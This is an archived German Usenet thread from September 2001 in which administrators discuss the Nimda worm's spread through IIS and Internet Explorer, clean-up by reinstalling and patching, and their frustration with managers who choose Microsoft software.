> Auf einem Server (auf Workstations hat der IIS nichts zu suchen) sollte man
> IMHO tunlichst alles unterlassen, was die Sicherheit gefaehrdet. Im Internet
> zu surfen oder Mails mit Outlook zu lesen gehoert eindeutig in diese
> Kategorie.

Ah ja, ich hätte das etwas deutlicher trennen sollen.
Ich gehe normalerweise davon aus, daß in dieser NG niemand - OK, die
meisten - einen Server zum Spaß aufsetzen.
Wir haben keine W2k/IIS-Server, der infizierte Rechner ist eine
W98-Workstation mit IE 5.5 (benutzt, trotz vorhandenem NS) und wurde
abgeklemmt, bis das System neuinstalliert ist.

> Nur solange $LUSER das nicht abschaltet.

Na Logo...

> > Also nicht hämisch werden, lieber die eigenen Systeme scannen und bei
> > Befund direkt von CD neu installieren.
>
> Tolle Idee. Du hast nur vergessen, dass Du waehrend der Installation die
> Netzwerkverbindung trennst und zwar so lange, bis Du alle Service Packs und
> Patches installiert hast. Viel Spass dass Deinem Arbeitgeber zu verklickern
> (Sorry Boss, aber www.$FIRMENNAME.de ist fuer 5 Stunden Offline). Da moechte
> ich nicht in Deiner Haut stecken :-)

Und wo liegt das Problem? Du steckst nicht in meiner Haut :-)
Aber erkläre uns doch bitte, wie DU den Virus entfernst, ohne
Neuinstallation. Wartest Du auf das Tool/Scanner und nimmst den Server
solange vom Netz - was sagt dein Chef wohl DAZU? Oder entfernst Du ihn
von Hand? Dann kannst Du uns ja mal deine Analyse des Virus zukommen
lassen. Oder lässt Du ihn weiterlaufen? Dann wird sich dein Chef
früher oder später genauso freuen.

> > Ich denke, da wird noch einiges auf uns zukommen...
>
> Ja, grosse Logfiles bei allen Apache Servern. Die anderen muessen ja
> regelmaessig neu installiert werden :-]

Übung macht den Meister ;)

Bis denne

Jens

Aik Richter

ungelesen,
19.09.2001, 11:05:5819.09.01
an
Heiko Schlenker wrote:
> * Jens Wilke <J.W...@wiso.uni-dortmund.de> schrieb:

>
>
>>Aber erkläre uns doch bitte, wie DU den Virus entfernst,
>>
>
> Nun, das Peinliche ist ja, wenn die Administratoren der befallenen
> Systeme ihren Job richtig gemacht hätten, dann wäre es gar nicht zu
> einer Infektion gekommen. Der Wurm/Virus nutzt nämlich *keine* neuen
> Sicherheitslücken aus. Wenn das der Chef erfährt...

...war er unter Umständen selber schuld.
Wenn ich z.B. mal von mir ausgehe, dann weiss ich solche Dinge wie:
patche und wo ich sie herbekomme
mechanismen im webserver
mechanismen zur Auth.
NEtzwerkdinge (also wege, abläufe, kausale zusammenhänge u.Ä.)

nur aus dem Netz. Ich bin hier der einzige UNIXer, niemand da, der mir
was beibringen könnte. Wenn ich nach Lehrgängen frage, ist grad keien
Zeit, wenn ich dinge vorchlage, entscheidet der Chef (der KEIN Admin
ist) ob wirs machen oder nicht.

Die Zeiten, in denen der Admin als Fachmann tatsächlich ncoh Einfluss
hatte, gehen langsam vorbei. Inzwischen ist der Admin nur noch ein
Dienstleister, der tut, was gesagt wird.

Wenn z.B. ein Admin vorschlägt, die eminent wichtigen websites doch
besser auf UNIX/Apache laufen zu lassen, udn der Chef das ablehnt ("Wir
benutzen MS-Software, weil eine richtige Firma nciht mit solchen
Freakkram wie LINUX arbeitet"), dann kann der ADMIN gar nix machen.

Aik Richter

Immo 'FaUl' Wehrenberg

ungelesen,
19.09.2001, 11:06:0719.09.01
an
begin followup to the posting of Stefan Laesche:
> Tolle Idee. Du hast nur vergessen, dass Du waehrend der Installation die
> Netzwerkverbindung trennst und zwar so lange, bis Du alle Service Packs und
> Patches installiert hast. Viel Spass dass Deinem Arbeitgeber zu verklickern
> (Sorry Boss, aber www.$FIRMENNAME.de ist fuer 5 Stunden Offline).

Wer, von den Admins, die ein www.$FIRMENNAME.de, bei dem es schlimm ist, wenn
der Server fuer 5 Stunden ausfaellt, hat freiwillig IIS installiert?

Und wenn man den nicht freiwillig installiert hat, kann man ja zum Lart
uebergehen: "Wegen einiger Fehlentscheidungen von $ENTSCHEIDER hatte ich
leider die Aufgabe, IIS auf NT zu installieren, fuer welchen immer wieder
Sicherheitsluecken auftauchen. Dieses ist mal wieder so eine. $BLAH"...


>> Ich denke, da wird noch einiges auf uns zukommen...
> Ja, grosse Logfiles bei allen Apache Servern. Die anderen muessen ja
> regelmaessig neu installiert werden :-]

Nein.

Nur IIS muss neu installiert werden.

Und nicht nur die Apaches, mein Publicfile erzeugt auch schon verdaechtig
grosse logs...

FaUl
end
This article does not support incompatible and broken newsreader.
--
SIGSIG (core dumped)
No signature left on device...

Immo 'FaUl' Wehrenberg

ungelesen,
19.09.2001, 11:09:0119.09.01
an
begin followup to the posting of Johann Burkard:

> Und jetzt kuckt mal, was sich hinter http://216.217.224.135/ verbirgt
> (allerdings nicht mit dem IE). :-)

Und?

Was soll an athm-216-217-xxx-135.home.net interessant sein? Vermutlich ist
das die IIS-Standardseite, wenn man nichts darauf veroeffentlicht.

Johann Burkard

ungelesen,
19.09.2001, 12:52:1619.09.01
an
Johann Burkard wrote:

[Text]

Habt ja Recht, ich dachte, das wäre `ne MS-Seite.

F'up2poster.

Wolfgang Ewert

ungelesen,
19.09.2001, 15:44:2519.09.01
an
Hallo Jochen , Du teiltest mit:

> Die anfragenden Rechner scheinen ...immer Win NT/2000 Rechner zu sein.
> Die Anfragen kommen alle aus meinem Subnet (T-Online Dial-Up 217.0.x.x).

Was machen Win2000-Server mit Dial-Up-Verbindungen?

kratzt sich am Kopf

Die meisten Code-Red- und jetzt auch Nimda-Attacken kommen von
DSL-dynamic-IPs.

Gruß
Wolfgang

Gerhard Schromm

ungelesen,
19.09.2001, 17:39:3219.09.01
an
On Wed, 19 Sep 2001, Urs Traenkner verbalised:

> Stefan Laesche wrote:
>> Jetzt frage ich mich nur noch, wer so daemlich sein kann und eine
>> .exe Datei oeffnet.
> Bei diesem Wurm musst Du das gar nicht, so wie es aussieht. Das
> macht OE oder der IE ganz fuer Dich allein.

Das nennt man Komfort. Jetzt muß man nicht einmal mehr selber klicken
um sich einen Wurm einzufangen.

> Und _das_ ist wirklich hart.

Nein das ist eine gerechte Strafe für die Unfähigen.

bye Gerhard
--
If you have to ask what jazz is, you'll never know.
-- Louis Armstrong

Gerhard Schromm

ungelesen,
19.09.2001, 17:44:4219.09.01
an
On 19 Sep 2001, Peter Suetterlin stated:

> Helmar Weser <do.not...@gmx.net> writes:
>> Autsch!! "Speichern der Datei readme.eml unter?", kam hier
>> (NS4.75). Kann denn Bill so doof sein, dass nicht mal die eigenen
>> Patches auf den eigenen Websites implementiert sind?
>
> Aber kannst ja mal 'seine' Sites abklappern - vielleicht hat's schon
> einen erwischt....

Nun mit Code Red hatte es ja sogar geklappt. IIRC hat es sogar den
Webserver mit den Patches für den selbigen erwischt.

Marc Haber

ungelesen,
20.09.2001, 03:57:2320.09.01
an
im...@faul.dyndns.org (Immo 'FaUl' Wehrenberg) wrote:
>Wer, von den Admins, die ein www.$FIRMENNAME.de, bei dem es schlimm ist, wenn
>der Server fuer 5 Stunden ausfaellt, hat freiwillig IIS installiert?

Bedauerlicherweise ziemlich viele.

Grüße
Marc

--
-------------------------------------- !! No courtesy copies, please !! -----
Marc Haber | " Questions are the | Mailadresse im Header
Karlsruhe, Germany | Beginning of Wisdom " | Fon: *49 721 966 32 15
Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fax: *49 721 966 31 29

Aik Richter

ungelesen,
20.09.2001, 04:16:0720.09.01
an
Heiko Schlenker wrote:
> * Aik Richter <aric...@fonts.de> schrieb:

>
>
>>Inzwischen ist der Admin nur noch ein Dienstleister, der tut, was
>>gesagt wird.
>>
>
> Du verwechselst "Dienstleister" mit "Prostituierter".

:),ja ist tragisch.

> Damit es nicht zu Karriereknicken kommt, empfehle ich, zweifelhafte
> Aufträge schriftlich bestätigen zu lassen und ggf. (Akten-)Notizen
> anzufertigen.

unglücklicherweise hab ich ne Papierallergie. Allerdings hab ich
ähnliches trotz allem in Planung.

>
>>Wenn z.B. ein Admin vorschlägt, die eminent wichtigen websites doch
>>besser auf UNIX/Apache laufen zu lassen, udn der Chef das ablehnt
>>("Wir benutzen MS-Software, weil eine richtige Firma nciht mit
>>solchen Freakkram wie LINUX arbeitet"), dann kann der ADMIN gar nix
>>machen.
>>
>

> Doch, kündigen.

Derzeit muss ich MIete zahlen und kann deshalb keine Risiken eingehen.
Also werd ich mich "geduldig" erweisen, jedoch ncht blöde :-)

AiK Richter

Peter Suetterlin

ungelesen,
20.09.2001, 08:39:2020.09.01
an
Gerhard Schromm <gerhard...@student.uni-ulm.de> writes:
> On 19 Sep 2001, Peter Suetterlin stated:

>> Aber kannst ja mal 'seine' Sites abklappern - vielleicht hat's schon
>> einen erwischt....

> Nun mit Code Red hatte es ja sogar geklappt. IIRC hat es sogar den
> Webserver mit den Patches für den selbigen erwischt.

Laut Posting im Heise-Ticker: www.microsoft.com/frontpage/ ....

Jens Wilke

ungelesen,
20.09.2001, 09:48:3620.09.01
an
On 19 Sep 2001 12:03:58 GMT, p...@phys.uu.nl (Peter Suetterlin) wrote:

> Aber kannst ja mal 'seine' Sites abklappern - vielleicht hat's schon
> einen erwischt....

Na sowas :->

http://www.theinquirer.net/200901203.htm

"...have been infected by the bug..."

Erkennt den schon irgendein Bugscanner? *g*

Bis denne

Jens

Immo 'FaUl' Wehrenberg

ungelesen,
20.09.2001, 10:55:2920.09.01
an
begin followup to the posting of Marc Haber:

> im...@faul.dyndns.org (Immo 'FaUl' Wehrenberg) wrote:
>>Wer, von den Admins, die ein www.$FIRMENNAME.de, bei dem es schlimm ist, wenn
>>der Server fuer 5 Stunden ausfaellt, hat freiwillig IIS installiert?
> Bedauerlicherweise ziemlich viele.

Na dann ist Lart doch berechtigt, nicht?

Jens Wilke

ungelesen,
20.09.2001, 12:01:3520.09.01
an
On Thu, 20 Sep 2001 09:57:23 +0200, Marc Haber
<mh+use...@zugschlus.de> wrote:

> >Wer, von den Admins, die ein www.$FIRMENNAME.de, bei dem es schlimm ist, wenn
> >der Server fuer 5 Stunden ausfaellt, hat freiwillig IIS installiert?
>
> Bedauerlicherweise ziemlich viele.

Und für die gibt es sogar schon ein Tool von Sophos. Allerdings dauert
die Prozedur auch einige Stunden und für NTFS braucht man NTFSDOS Pro
(o.ä).

http://www.sophos.com/downloads/readswnm.txt


Datafellows: "If your web site is running an unsafe version of IIS,
the worm can infect your site by accessing it through http. After this
it will restart spreading from your server. In this case, it is not
enough to just clean the virus - your web server is unsafe and has
been so for a while. It's likely there have been previous illegimate
accesses to your site as well and it should be considered compromised.
We recommend rebuilding the web server and applying latest patches
before restoring clean copies of the html pages."

Dem ist wohl nichts hinzuzufügen.

Bis denne

Jens

Holger Marzen

ungelesen,
21.09.2001, 03:32:5221.09.01
an
* On 19 Sep 2001 15:21:16 GMT, Guido Hennecke wrote:

> * Aik Richter <aric...@fonts.de> wrote:
> [...]


>> Wenn z.B. ein Admin vorschlägt, die eminent wichtigen websites doch
>> besser auf UNIX/Apache laufen zu lassen, udn der Chef das ablehnt ("Wir
>> benutzen MS-Software, weil eine richtige Firma nciht mit solchen
>> Freakkram wie LINUX arbeitet"), dann kann der ADMIN gar nix machen.
>

> Doch! Kuendigen. Und das ist ernst gemeint. Nicht ueberall laeuft es so,
> wie Du das beschreibst.

Kann ich bestätigen. Und dazu muss man nicht in eine Freakfirma gehen.
Es gibt genügend Rechenzentren, wo OS/390, OS/2, Wixdos, Solaris, AIX
und Linux eingesetzt werden - jenachdem unter was die Anwendung am
besten und günstigsten läuft.

0 neue Nachrichten